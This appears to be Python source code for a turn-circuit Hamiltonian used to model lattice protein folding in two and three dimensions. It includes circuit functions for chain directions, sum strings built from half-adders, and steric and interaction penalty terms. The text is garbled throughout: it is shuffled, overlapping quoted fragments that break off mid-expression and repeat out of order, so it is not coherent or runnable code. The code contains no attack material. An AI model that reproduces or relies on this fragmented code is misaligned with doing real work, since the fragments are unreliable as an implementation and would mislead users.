"(self.a_x(i, j) + \\ self.a_y(i, j) + \\ self.a_z(i, j)) def interaction_term(self): \"\"\"Computes", "= True @property def dim(self): return 3 def pointer(self, i): \"\"\"Points to the", "does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1))", "in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap term for residues i", "def a_y(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i,", "sumstring['y-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def interaction_term_ij(self,", "sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k ==", "p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1, p+1)]) \\ *", "t in range(i, j)] elif k == 'y+': sum_string = [self.circuit_yp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2))", "if i-j != 0 else 0 if (j-i) % 2 != 0 or", "range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1* self.int_mat[i, j] * (self.a_x(i, j)", "== 'y-': sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] else: raise", "in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain does not go back on", "\\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r", "a circuit that returns 1 if the chain moves in the direction z-.\"\"\"", "in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for", "that the chain does not go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1),", "for j in range(1, math.ceil((self.naas-i-1)/2)): if self.int_mat[i, 1+i+2*j] == 0: continue expr +=", "3 def pointer(self, i): \"\"\"Points to the start of the string describing the", "'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0", "string 000.\"\"\" return (1-q_i) * (1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j, q_k):", "the chain moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i, j,", "> j\") if (i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if", "* (1-q_j) * (1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit that", "sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)] =", "the chain moves in the direction y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i, q_j):", "\\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def", "in range(maximum)] return self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements the term that penalises", "range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for", "ith turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements a circuit that returns", "self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) +", "if i-j != 0 else 0 if maximum == 0: return 0 prefactor", "( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)])", "* (1-q_k) def circuit_011(self, q_i, q_j, q_k): \"\"\"Implements a circuit that checks the", "q_k def circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if", "\\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in range(1, p-1)]) \\ * qand([", "TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property def dim(self): return 3 def pointer(self, i): \"\"\"Points", "moves in the direction y+.\"\"\" return q_i*q_j def circuit_yn(self, q_i, q_j): \"\"\"Implements a", "q_j * (1-q_k) def circuit_zp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns", "def dim(self): return 3 def pointer(self, i): \"\"\"Points to the start of the", "qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)]) \\", "r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] ) def", "a circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) * (1-q_j) *", "for t in range(i, j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1))", "qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['y+'][p-2], sumstring['y+'][p-1])", "circuit that returns 1 if the chain moves in the direction x+.\"\"\" return", "itertools import chain from functools import reduce from .qlogic import * from proteinham.core.hamiltonian", "= [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements", "was {:s}'.format(k)) n_layers = j-i-1 counter = np.zeros(n_layers) # lazy way to keep", "\\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2))", "q_i, q_j): \"\"\"Implements a circuit that returns 1 if the chain moves in", "the chain moves in the direction z+.\"\"\" return (1-q_i) * (1-q_j) * q_k", "maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in", "@property @abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D = True @property def dim(self):", "0 if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for", "[qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in", "in range(maximum)]) for k in ['x', 'y']]) return prefactor * \\ ( qxor(sumstring['z+'][0],", "k == 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)]", "to the start of the string describing the ith turn.\"\"\" return 2*i def", "self.get(self.pointer(i+1)+2)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)),", "== 'z-': sum_string = [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] else:", "t % 2 == 0: iterator = range(0, t+1, 2) if t >", "if t > 0 else [0] else: iterator = range(1, t+1, 2) if", "'babej': if counter[h] > math.log2(j-i): continue else: counter[h] += 1 a, b =", "sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if i > j: raise", "iterator = range(0, t+1, 2) if t > 0 else [0] else: iterator", "\\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] ) def steric_term(self): \"\"\"Ensures that the", "qxnor(sumstring['x+'][r-1], sumstring['x+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for", "sum_string = list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if t % 2 ==", "[qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in", "( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(1, maximum)])", "j)) def interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i in", "moves in the direction y+.\"\"\" return q_i * (1-q_j) * q_k def circuit_yn(self,", "q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if", "for r in range(maximum)] + \\ [qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)] )", "the hamiltonian.\"\"\" return self.bit_list[k] def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i,", "\\ ( qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1,", "if the chain moves in the direction x+.\"\"\" return q_i * q_j *", "interaction_term(self): \"\"\"Computes contacts between residues.\"\"\" expr = sp.numbers.Integer(0) for i in range(self.naas-3): for", "int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)]", "et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = self.dim * (self.naas-1) self._sum_strings", "'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'),", "qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\", "h in iterator: if self.ss_fmat == 'babej': if counter[h] > math.log2(j-i): continue else:", "* qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1],", "qxor(sumstring['z+'][0], sumstring['z-'][0]) \\ * qand([ qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(1, maximum)]) \\", "sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['x', 'y']]) return", "\\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self, i,", "for p in range(2, maximum+1)])) def interaction_term_ij(self, i, j): return -1 * self.int_mat[i,", "'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-')", "self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1))", "qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2, maximum+1)]))", "x in range(maximum)] return self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements the term that", "in range(self.naas)]) def a_x(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'),", "sumstring['z-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r", "[self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] else: raise ValueError('k was {:s}'.format(k))", "def half_adder(self, q_i, q_j): \"\"\"Applies a half-adder.\"\"\" return qand([q_i, q_j]), qxor(q_i, q_j) @property", "j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum", "qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for", "= se.expand(self.expr) self.n_terms = len(self.expr.args) def get(self, k): \"\"\"Access the kth bit of", "qand([q_i, q_j]), qxor(q_i, q_j) @property @abstractmethod def dim(self): pass class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian): is_2D =", "= [self.circuit_zn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] else: raise ValueError('k was", "prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]) return prefactor *\\ (", "'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-')", "residues.\"\"\" expr = sp.numbers.Integer(0) for i in range(self.naas-3): for j in range(1, math.ceil((self.naas-i-1)/2)):", "back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) +", "'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j))))", "return -1 * self.int_mat[i, j] * (self.a_x(i, j) + \\ self.a_y(i, j)) def", "the term that penalises meaningless residue bitstrings 000 and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)),", "else 0 if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r])", "@property def dim(self): return 3 def pointer(self, i): \"\"\"Points to the start of", "self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j", "import tqdm, trange from copy import deepcopy from itertools import chain from functools", "self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) for", "a circuit that returns 1 if the chain moves in the direction y-.\"\"\"", "string 000.\"\"\" return (1-q_i) * q_j * q_k def sum_string(self, i, j, k):", "in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)),", "= range(1, t+1, 2) if t > 1 else [1] for h in", "np.zeros(n_layers) # lazy way to keep track of half-adders sum_string = list(reversed(sum_string)) for", "(i, j, k) in self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k == 'x+':", "circuit_zn(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain", "for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the chain does not go", "maximum == 0: return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+' % k][r], sumstring['%s-'", "continue else: counter[h] += 1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a", "j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def", "import Hamiltonian class CommonTurnCircuitHamiltonian(Hamiltonian): is_TurnCircuit = True def __init__(self, pepstring, ss_fmat='babej'): \"\"\"Encapsulates the", "* qand([ qxor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['z+'][r-1],", "range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(p+1, maximum+1)]) for", "* qand([ qxnor(sumstring['y+'][r-1], sumstring['y+'][r]) for r in range(1, p-1)]) \\ * qand([ qxor(sumstring['y+'][r-1],", "if the chain moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j) def sum_string(self, i,", "self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for", "the direction x+.\"\"\" return q_i * q_j * q_k def circuit_xn(self, q_i, q_j,", "j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t", "j)] elif k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in", "r in range(p+1, maximum+1)]) for p in range(2, maximum+1)])) def a_z(self, i, j):", "of the string describing the ith turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j):", "j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0 else 0 if maximum", "if the chain moves in the direction x-.\"\"\" return q_i*(1-q_j) def circuit_yp(self, q_i,", "circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1 if the chain", "maximum+1)]) for p in range(2, maximum+1)])) def a_z(self, i, j): sumstring = {", "j, 'z+'), 'z-': self.sum_string(i, j, 'z-') } maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j !=0", "0 if maximum == 0: return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+' %", "j, 'z+'), 'z-': self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r", "k == 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)]", "for t in range(i, j)] elif k == 'z+': sum_string = [self.circuit_zp(self.get(self.pointer(t)), self.get(self.pointer(t)+1),", "and 011.\"\"\" return sum([ self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for", "self.circuit_yp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) +", "nonsensical string 000.\"\"\" return (1-q_i) * q_j * q_k def sum_string(self, i, j,", "in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter =", "that returns 1 if the chain moves in the direction y-.\"\"\" return (1-q_i)*(1-q_j)", "of half-adders sum_string = list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if t %", "checks the nonsensical string 000.\"\"\" return (1-q_i) * q_j * q_k def sum_string(self,", "[sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements the", "self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) +", "'turn_circuit' def build_exp(self): self.expr = (self.naas+1) * self.back_term() if self.dim == 3: self.expr", "0: iterator = range(0, t+1, 2) if t > 0 else [0] else:", "!= 0 else 0 if (j-i) % 2 != 0 or maximum <", "'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } maximum = int(math.ceil(math.log2(abs(i-j))))", "moves in the direction x-.\"\"\" return q_i * (1-q_j) * (1-q_k) def circuit_yp(self,", "self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'z-': sum_string =", "\\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ * qand([ qxnor(sumstring['z+'][r-1], sumstring['z+'][r]) for r in", "\\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def back_term(self): \"\"\"Ensures that the", "sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b maximum = int(math.ceil(math.log2(j-i))) sum_string = list(reversed(sum_string))", "else 0 if maximum == 0: return 0 prefactor = qand([ qand([ qxnor(sumstring['%s+'", "self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] +", "in the direction y-.\"\"\" return q_i * q_j * (1-q_k) def circuit_zp(self, q_i,", "'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j, 'x-'), 'y+': self.sum_string(i, j, 'y+'), 'y-':", "ss_fmat self.n_bits = self.dim * (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def encoding(self):", "@property def encoding(self): return 'turn_circuit' def build_exp(self): self.expr = (self.naas+1) * self.back_term() if", "'y+': self.sum_string(i, j, 'y+'), 'y-': self.sum_string(i, j, 'y-'), 'z+': self.sum_string(i, j, 'z+'), 'z-':", "j, 'y+'), 'y-': self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r", "self.get(self.pointer(i+1)+1)) for i in range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap term", "self.circuit_000(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) + \\ self.circuit_011(self.get(self.pointer(k)), self.get(self.pointer(k)+1), self.get(self.pointer(k)+2)) for k in range(self.naas-1)]) def", "qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for", "the string describing the ith turn.\"\"\" return 2*i def circuit_xp(self, q_i, q_j): \"\"\"Implements", "sumstring['z-'][r]) for r in range(1, maximum)]) \\ + sum([ qxor(sumstring['z+'][p-2], sumstring['z+'][p-1]) \\ *", "deepcopy from itertools import chain from functools import reduce from .qlogic import *", "\"\"\"Computes the overlap term for residues i and j.\"\"\" maximum = int(math.ceil(math.log2(abs(i-j)))) if", "self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) for i in range(self.naas-2)]) def overlap(self,", "+= 1 a, b = self.half_adder(sum_string[h], sum_string[h+1]) sum_string[h] = a sum_string[h+1] = b", "qxor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for r in range(1, p+1)]) \\ * qand([ qxnor(sumstring['y+'][r-1], sumstring['y-'][r-1]) for", "maximum = int(math.ceil(math.log2(abs(i-j)))) if i-j != 0 else 0 if maximum == 0:", "range(self.naas-2)]) def overlap(self, i, j): \"\"\"Computes the overlap term for residues i and", "form, described by Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits =", "a_x(self, i, j): sumstring = { 'x+': self.sum_string(i, j, 'x+'), 'x-': self.sum_string(i, j,", "self._sum_strings.keys(): return self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1),", "to the start of the string describing the ith turn.\"\"\" return 3*i def", "2 def pointer(self, i): \"\"\"Points to the start of the string describing the", "self.redun_term() self.expr += (self.naas+1) * self.steric_term() self.expr += self.interaction_term() #self.expr = se.expand(self.expr) self.n_terms", "\\ self.circuit_xn(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_xp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1)) + \\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1))", "reversed(range(n_layers-1))): if t % 2 == 0: iterator = range(0, t+1, 2) if", "sumstring['y-'][r]) for r in range(maximum)] + \\ [qxnor(sumstring['z+'][r], sumstring['z-'][r]) for r in range(maximum)]", "2) if t > 0 else [0] else: iterator = range(1, t+1, 2)", "[self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'x-': sum_string", "= (self.naas+1) * self.back_term() if self.dim == 3: self.expr += (self.naas+1)**2 * self.redun_term()", "iterator: if self.ss_fmat == 'babej': if counter[h] > math.log2(j-i): continue else: counter[h] +=", "0 else 0 if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['x+'][r],", "0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r in range(maximum)]) return", "for x in range(maximum)] return self._sum_strings[(i, j, k)] def redun_term(self): \"\"\"Implements the term", "* qand([ qxnor(sumstring['z+'][r-1], sumstring['z-'][r-1]) for r in range(p+1, maximum+1)]) for p in range(2,", "q_j * q_k def sum_string(self, i, j, k): \"\"\"Computes the sum string.\"\"\" if", "sumstring['x-'][0]) \\ * qand([ qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(1, maximum)]) \\ +", "'y+'), 'y-': self.sum_string(i, j, 'y-') } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in", "t in range(i, j)] else: raise ValueError('k was {:s}'.format(k)) n_layers = j-i-1 counter", "go back on itself.\"\"\" return sum([ self.circuit_xp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_xn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2))", "in range(1, p-1)]) \\ * qand([ qxor(sumstring['x+'][r-1], sumstring['x-'][r-1]) for r in range(1, p+1)])", "sum_string = [self.circuit_yn(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for t in range(i, j)] else: raise ValueError('k was", "return prefactor *\\ ( qxor(sumstring['y+'][0], sumstring['y-'][0]) \\ * qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r", "if maximum == 0: return 0 prefactor = qand([ qxnor(sumstring['y+'][r], sumstring['y-'][r]) for r", "i): \"\"\"Points to the start of the string describing the ith turn.\"\"\" return", "from abc import * from tqdm import tqdm, trange from copy import deepcopy", "if i > j: raise ValueError(\"i > j\") if (i, j, k) in", "* (1-q_k) def circuit_yp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1", "as np import sympy as sp import symengine as se from abc import", "return q_i * (1-q_j) * q_k def circuit_yn(self, q_i, q_j, q_k): \"\"\"Implements a", "continue expr += self.interaction_term_ij(i, 1+i+2*j) return expr class TurnCircuitHamiltonian3D(CommonTurnCircuitHamiltonian): is_3D = True @property", "== 'x-': sum_string = [self.circuit_xn(self.get(self.pointer(t)), self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif", "k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return self._sum_strings[(i, j, k)] def redun_term(self):", "'z-': self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)]", "a circuit that checks the nonsensical string 000.\"\"\" return (1-q_i) * q_j *", "that returns 1 if the chain moves in the direction x-.\"\"\" return q_i*(1-q_j)", "self.get(self.pointer(t)+1), self.get(self.pointer(t)+2)) for t in range(i, j)] elif k == 'y-': sum_string =", "keep track of half-adders sum_string = list(reversed(sum_string)) for t in chain(range(n_layers), reversed(range(n_layers-1))): if", "r in range(maximum)]) return prefactor * \\ ( qxor(sumstring['x+'][0], sumstring['x-'][0]) \\ * qand([", "return self._sum_strings[(i, j, k)] if k == 'x+': sum_string = [self.circuit_xp(self.get(self.pointer(t)), self.get(self.pointer(t)+1)) for", "\\ self.circuit_yp(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_yn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_yn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2))", "self.sum_string(i, j, 'z-'), } return qand( [qxnor(sumstring['x+'][r], sumstring['x-'][r]) for r in range(maximum)] +", "return 3*i def circuit_xp(self, q_i, q_j, q_k): \"\"\"Implements a circuit that returns 1", "* (self.naas-1) self._sum_strings = dict() self._create_bitreg() @property def encoding(self): return 'turn_circuit' def build_exp(self):", "sum_string = list(reversed(sum_string)) self._sum_strings[(i, j, k)] = [sp.expand(sum_string[x]) for x in range(maximum)] return", "by Babbush et al., 2012.\"\"\" self._proc_input(pepstring) self.ss_fmat = ss_fmat self.n_bits = self.dim *", "direction y+.\"\"\" return q_i * (1-q_j) * q_k def circuit_yn(self, q_i, q_j, q_k):", "import symengine as se from abc import * from tqdm import tqdm, trange", "range(i+1, self.naas)]) for i in range(self.naas)]) def a_x(self, i, j): sumstring = {", "self.get(self.pointer(i)+2)) * self.circuit_zn(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1), self.get(self.pointer(i+1)+2)) + \\ self.circuit_zn(self.get(self.pointer(i)), self.get(self.pointer(i)+1), self.get(self.pointer(i)+2)) * self.circuit_zp(self.get(self.pointer(i+1)), self.get(self.pointer(i+1)+1),", "sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['y', 'z']]) return", "k][r], sumstring['%s-' % k][r]) for r in range(maximum)]) for k in ['x', 